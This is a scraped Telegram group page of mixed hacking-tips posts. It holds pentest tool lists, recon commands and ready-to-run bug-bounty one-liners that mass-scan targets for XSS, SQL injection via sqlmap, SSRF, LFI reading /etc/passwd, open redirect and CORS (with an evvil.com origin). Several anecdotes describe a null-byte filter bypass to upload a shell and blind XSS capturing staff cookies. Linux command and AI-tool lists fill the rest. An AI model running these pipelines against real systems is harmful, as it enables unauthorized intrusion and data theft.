en
Feedback
Termux All Command [Telegram Group]

Termux All Command [Telegram Group]

Open in Telegram

Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full

Show more
1 328
Subscribers
+524 hours
+177 days
+5730 days
Posts Archive
🔊 100 tools every Web Pentester must know Burp Suite OWASP ZAP Metasploit Framework sqlmap Nmap Dirbuster WPScan Arachni BeEF Hydra XSSer Sqlninja Cain and Abel Netcat THC Hydra Nikto Skipfish Vega sqlsus John the Ripper THC-SSL-DOS Sublist3r Wfuzz Shodan Fiddler sqlmapgui Wapiti Yersinia Tamper Data WebScarab Paros SQL Inject Me Acunetix Nessus Grendel-Scan Ratproxy IronWASP Websecurify Zed Attack Proxy Zenmap NoSQLMap ODAT X-Forwarded-For Spoofer WebSlayer w3af Maltego WPScan Desktop WP-Scan Vulnerability Database BruteForcer JoomScan Joomfish Scanner WP Security Audit Log JoomlaScan CMSmap Vega Vulnerability Scanner Skipfish Web Application Security Scanner Grabber DAVScan bbqsql Scrawlr Cewl Wapiti Web Application Vulnerability Scanner XssPy RIPS Zenmap WPScan Arachni OWASP ZAP Sqlmap Nessus Kali Linux Acunetix Web Vulnerability Scanner Nmap Vega Metasploit Framework Hydra Burp Suite Nikto Zed Attack Proxy Grendel-Scan Skipfish Arachni Wfuzz Dirbuster Sqlninja NoSQLMap OWASP Mantra WP-Scanner XSSer Metagoofil Brutus RainbowCrack THC-Hydra Medusa THC-SSL-DOS OpenVAS WP-Scan Vulnerability Database WPScan Desktop LFI Suite XssPy ━━━━━━━━━━━━━━━

👨‍💻 BUG BOUNTY WITH ONE-LINE BASH SCRIPTS 🕵️ 𝐗𝐒𝐒 ⪼ cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")" 𝐒𝐐𝐋𝐢 ⪼ httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' 𝐒𝐒𝐑𝐅 ⪼ findomain -t http://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace 𝘩𝘵𝘵𝘱://𝘠𝘖𝘜𝘙.𝘣𝘶𝘳𝘱𝘤𝘰𝘭𝘭𝘢𝘣𝘰𝘳𝘢𝘵𝘰𝘳.𝘯𝘦𝘵 𝐋𝐅𝐈 ⪼ gau http://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' 𝐎𝐏𝐄𝐍 𝐑𝐄𝐃𝐈𝐑𝐄𝐂𝐓 ⪼ gau http://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"' 𝐏𝐑𝐎𝐓𝐎𝐓𝐘𝐏𝐄 𝐏𝐎𝐋𝐋𝐔𝐓𝐈𝐎𝐍 ⪼ subfinder -d http://target.com | httpx -silent | sed 's/$/\/?proto[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN" 𝐂𝐎𝐑𝐒 ⪼ gau http://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done 𝐄𝐱𝐭𝐫𝐚𝐜𝐭 .𝐣𝐬 ⪼ echo http://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 assetfinder http://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew 𝐄𝐱𝐭𝐫𝐚𝐜𝐭 𝐔𝐑𝐋𝐬 𝐟𝐫𝐨𝐦 𝐜𝐨𝐦𝐦𝐞𝐧𝐭 ⪼ cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' 𝐃𝐮𝐦𝐩 𝐈𝐧-𝐬𝐜𝐨𝐩𝐞 𝐀𝐬𝐬𝐞𝐭𝐬 𝐟𝐫𝐨𝐦 𝐇𝐚𝐜𝐤𝐞𝐫𝐎𝐧𝐞 ⪼ curl -sL 𝘩𝘵𝘵𝘱𝘴://𝘨𝘪𝘵𝘩𝘶𝘣.𝘤𝘰𝘮/𝘢𝘳𝘬𝘢𝘥𝘪𝘺𝘵/𝘣𝘰𝘶𝘯𝘵𝘺-𝘵𝘢𝘳𝘨𝘦𝘵𝘴-𝘥𝘢𝘵𝘢/𝘣𝘭𝘰𝘣/𝘮𝘢𝘴𝘵𝘦𝘳/𝘥𝘢𝘵𝘢/𝘩𝘢𝘤𝘬𝘦𝘳𝘰𝘯𝘦_𝘥𝘢𝘵𝘢.𝘫𝘴𝘰𝘯?𝘳𝘢𝘸=𝘵𝘳𝘶𝘦 | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] 𝐅𝐢𝐧𝐝 𝐥𝐢𝐯𝐞 𝐡𝐨𝐬𝐭/𝐝𝐨𝐦𝐚𝐢𝐧/𝐚𝐬𝐬𝐞𝐭𝐬 ⪼ subfinder -d http://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u 𝐒𝐜𝐫𝐞𝐞𝐧𝐬𝐡𝐨𝐭 ⪼ assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'

🚨 Essential Mind Maps for Bug Hunters! Boost your bug bounty skills with Mind-Maps Repository by Imran Parray. Topics include: Bug Hunting Methodology 2FA & OAuth Testing SSRF, Server-side Issues, and more! 🔗 Explore here: https://lnkd.in/g-_jwEGM

Subdosec - Subdomain takeover scanner CLI : https://lnkd.in/gmW-nth3 Web Based : https://lnkd.in/gxn2AmHA

OSINT tool for searching people's digital footprint and leaked passwords across various social networks, written in Go. : https://github.com/ibnaleem/gosearch

🚀 LINUX BASIC COMMANDS 🚨 File and Directory Management: 1. ls: List files and directories. 2. cd: Change directory. 3. pwd: Display the current directory. 4. mkdir: Create a new directory. 5. rm: Remove files or directories. 6. cp: Copy files or directories. 7. mv: Move or rename files. 8. touch: Create an empty file. 9. tree: Display directory structure. File Viewing and Editing: 10. cat: Display file content. 11. less / more: View files page by page. 12. head: Show the first 10 lines. 13. tail: Show the last 10 lines. 14. nano: A simple text editor. 15. vi / vim: An advanced text editor. Search Operations: 16. find: Locate files and directories. 17. grep: Search within files. 18. locate: Quickly find files using a database. 19. which: Locate a command’s path. Disk and File System Management: 20. df: Display disk space usage. 21. du: Show directory or file size. 22. mount / umount: Mount or unmount file systems. 23. lsblk: List all block devices. 24. fsck: Check and repair file systems. Process and System Monitoring: 25. ps: Display running processes. 26. top: Monitor system processes. 27. htop: Interactive process manager. 28. kill: Terminate a process. 29. uptime: Show system uptime. 30. free: Check memory usage. Networking Commands: 31. ping: Check connectivity. 32. curl: Transfer data to/from servers. 33. wget: Download files from the internet. 34. ifconfig / ip: View or configure network interfaces. 35. netstat: Show network statistics. 36. ssh: Remote access to servers. 37. SCP: Securely Copy Files Between Systems Permissions and Ownership: 38. chmod: Modify file permissions 39. chown: Change file owner/group 40. umask: Set default permissions Archiving and Compression: 41. tar: Archive and compress files 42. gzip/gunzip: Compress and decompress files 43. zip/unzip: Handle zip files System Information: 44. uname -a: Show system information 45. hostname: Display system hostname 46. whoami: Current user 47. id: Show user and group IDs 48. dmesg: Kernel log messages 49. lscpu: CPU architecture information 50. lsusb: List USB devices 51. lspci: Show PCI devices hashtag#linux hashtag#commands hashtag#serversupport hashtag#supportexecutive hashtag#monitoring

Finally, let's run sqlmap on all identified potentially vulnerable URLs. findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent hashtag#web hashtag#sqli

now its become so easy for making notes from any youtube video just type study.lol/ in front of any youtube video like study.lol/https://youtubevideolink it will give u all video summary and amazing question answer in flashcards try it(not a promo i just found it  yesterday and found it useful)

🛠️ 20 Very Advanced Information Gathering Tools 🛠️ 1. Nmap ➤ Network Scanner 🔗 github.com/nmap/nmap 2. Maltego ➤ Visual Link Analysis 🔗 maltego.com 3. Shodan ➤ IoT Search Engine 🔗 github.com/m4ll0k/Shodanfy.py 4. Recon-ng ➤ Web Reconnaissance Framework 🔗 github.com/lanmaster53/recon-ng 5. Spiderfoot ➤ OSINT Automation Tool 🔗 github.com/smicallef/spiderfoot 6. theHarvester ➤ Email and Subdomain Gatherer 🔗 github.com/laramies/theHarvester 7. Amass ➤ Network Mapping of Attack Surfaces 🔗 github.com/OWASP/Amass 8. RED HAWK ➤ All-In-One Scanning Tool 🔗 github.com/Tuhinshubhra/RED_HAWK 9. ReconSpider ➤ Multi-purpose Gathering Tool 🔗 github.com/bhavsec/reconspider 10. OSINT Framework ➤ Comprehensive Information Gathering Collection 🔗 github.com/lockfale/OSINT-Framework 11. Infoga ➤ Email OSINT Gatherer 🔗 github.com/m4ll0k/Infoga 12. Striker ➤ Offensive Information Gathering Tool 🔗 github.com/s0md3v/Striker 13. SecretFinder ➤ API Key and Secret Finder 🔗 github.com/m4ll0k/SecretFinder 14. Xerosploit ➤ Penetration Testing Toolkit 🔗 github.com/LionSec/xerosploit 15. FOCA ➤ Metadata Analyzer 🔗 github.com/ElevenPaths/FOCA 16. ReconDog ➤ Reconnaissance Swiss Army Knife 🔗 github.com/s0md3v/ReconDog 17. Metagoofil ➤ Metadata Extractor 🔗 github.com/laramies/metagoofil 18. Dracnmap ➤ Nmap Script Wrapper 🔗 github.com/Screetsec/Dracnmap 19. Rang3r ➤ Multi-threaded Port Scanner 🔗 github.com/floriankunushevci/rang3r 20. Breacher ➤ Admin Panel Finder 🔗 github.com/s0md3v/Breacher 🚀 Stay tuned for more advanced tools & guides 🔔 Follow us for daily updates on cybersecurity 👥 Join our channel for more insights! https://t.me/teammatrixs

Website Security       Urlscan.io - URL and website scanner        →https://urlscan.io/ VirusTotal URL Search VirusTotal        →https://www.virustotal.com/gui/home/url Threat Intelligence Platform        →https://threatintelligenceplatform.com/ Is This Website Safe        →https://safeweb.norton.com/ Safe Browsing site status        →https://transparencyreport.google.com/safe-browsing/search?hl=en WHOIS IP Lookup Tool        →https://www.ultratools.com/tools/ipWhoisLookupResult Find Website IP Address        →https://www.ipvoid.com/find-website-ip/ IP Address Blacklist Check        →https://www.ipvoid.com/ip-blacklist-check/ Check The Website’s SSL Certificate See Your Entire Attack Surface in Real-Time. Get a current view of all of your organization's assets so you can proactively prevent targeted attacks and investigate suspicious activity.        →https://censys.io/ipv4 SpiderFoot        →https://www.spiderfoot.net/ Tools for Looking up Malicious Websites        →https://zeltser.com/lookup-malicious-websites/ How to Tell if a Website is Dangerous        →https://www.secjuice.com/how-to-tell-if-a-website-is-dangerous/ Malicious URL Scanner        →https://www.ipqualityscore.com/threat-feeds/malicious-url-scanner Threatlog - Malicious Domains Database Database of malicious domains, fraudulent and phishing domains, malware domains database, threat intelligence feeds, detect potentially malicious domains.        →https://www.threatlog.com/ Opswat - MetaDefender Cloud Cloud-based Deep CDR, Multiscanning, Sandbox Dynamic Analysis, Hash and IP-Domain reputation with options for personal and commercial users.        →https://metadefender.opswat.com/

Discovered Information Disclosure Vulnerability via Directory and File Disclosure 🔍 ~Tip: Add the file /unstable/ to your wordlist, and you might discover some juicy data. 💡 Enjoy! 🚀

[Red Team] Recon Techniques #1: Expanding the Attack Surface Using AS Numbers If a company or organization has its own AS number (Autonomous System Number), we can leverage it to gather further information about IP blocks, domains, and services associated with the target organization, this technique is highly useful in the information-gathering phase to expand the attack surface. Identifying IP blocks associated with the AS number: $ whois -h whois.radb.net -- "-i origin $ASN" | awk '/^route:/ {print $2}' | sort -u > ip-block.txt Scanning the status of active hosts from the IP block list: $ nmap -sn -PS -iL ip-block.txt -v -oG ips.txt Retrieving a list of responsive active IPs: $ cat ips.txt | grep -i up | grep -oP '(?<=Host: )\S+' | httpx -silent Using this technique, we can identify active and relevant services, which can then be explored further to uncover potential vulnerabilities in the identified hosts.

I found LFI Vulnerability via an Image Upload Page🎯 How I did it : First, I used Subfinder to gather all subdomains (Tip: Always configure your API keys for the best results). Then I used the httpx-toolkit tool to collect all alive subdomains into one file. After that, I ran ffuf with my custom wordlist on the file. I found an image upload page during fuzzing. I wrote a shell script and uploaded it. To bypass the filter, I used a null-byte trick: For example, renaming shell.hs to shell.hs%00.png (adding %00.png after shell.hs) Finally, I discovered the LFI vulnerability

Another Bug Bounty Story - 🚨 Blind XSS Escalation: From Bio to Breach: What started as a simple HTML injection vulnerability in the profile bio page escalated into a high-impact Blind XSS attack when a staff member viewed the profile in their internal system. ✅ Impact: The payload executed in the staff panel, exposing sensitive session data like cookies, IP addresses, and full DOM access. This allowed me to capture an image of the staff panel and craft specific payloads to navigate and interact with internal systems dynamically—uncovering critical weaknesses within their infrastructure. 🎯 Recommended tools for BXSS hunters: Online tools: bxsshunter - https://bxsshunter.com/ Link: https[:]//bxsshunter[.]com/ bughunter - https://lnkd.in/ddUfmQx8 Link: https[:]//xss[.]bughunter[.]app/dashboard/payload xss0r - https://xss0r.com/ Link: https[:]//xss0r[.]com Github tool: xsshunter - https://lnkd.in/d5jmgkhw Link: https[:]//github[.]com/trufflesecurity/xsshunter

CloakQuest3r CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare and other alternatives, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. TOOL GITHUB LINK: https://lnkd.in/dvNMPuge

💡OnionGPT - Have fun! 😁 http://oniongpt6lntsoztgylhju7nmqedlq6fjexe55z327lmxyae3nutlyad[.]onion/

3 Ways to Install Packages in Kali Linux | @TechBolt27 : https://www.youtube.com/watch?v=stRLqy5ARFI

Access onion sites online without Tor browser: https://tor2web.activetk.jp/

100 AI Tools to replace your tedious work: 1. Research - ChatGPT - YouChat - Abacus - Perplexity - Copilot - Gemini 2. Image - Fotor - Stability AI - Midjourney - Microsoft Designer 3. CopyWriting - Rytr - Copy AI - Writesonic - Adcreative AI 4. Writing - Jasper - HIX AI - Jenny AI - Textblaze - Quillbot 5. Website - 10Web - Durable - Framer - Style AI 6. Video - Klap - Opus - Eightify - InVideo - HeyGen - Runway - ImgCreator AI - Morphstudio .xyz 7. Meeting - Tldv - Otter - Noty AI - Fireflies 8. SEO - VidIQ - Seona AI - BlogSEO - Keywrds ai 9. Chatbot - Droxy - Chatbase - Mutual info - Chatsimple 10. Presentation - Decktopus - Slides AI - Gamma AI - Designs AI - Beautiful AI 11. Automation - Make - Zapier - Xembly - Bardeen 12. Prompts - FlowGPT - Alicent AI - PromptBox - Promptbase - Snack Prompt 13. UI/UX - Figma - Uizard - UiMagic - Photoshop 14. Design - Canva - Flair AI - Designify - Clipdrop - Autodraw - Magician design 15. Logo Generator - Looka - Designs AI - Brandmark - Stockimg AI - Namecheap 16. Audio - Lovo ai - Eleven labs - Songburst AI - Adobe Podcast 17. Marketing - Pencil - Ai-Ads - AdCopy - Simplified - AdCreative 18. Startup - Tome - Ideas AI - Namelix - Pitchgrade - Validator AI 19. Productivity - Merlin - Tinywow - Notion AI - Adobe Sensei - Personal AI 20. Social media management - Tapilo - Typefully - Hypefury - TweetHunter https://techtheworld.net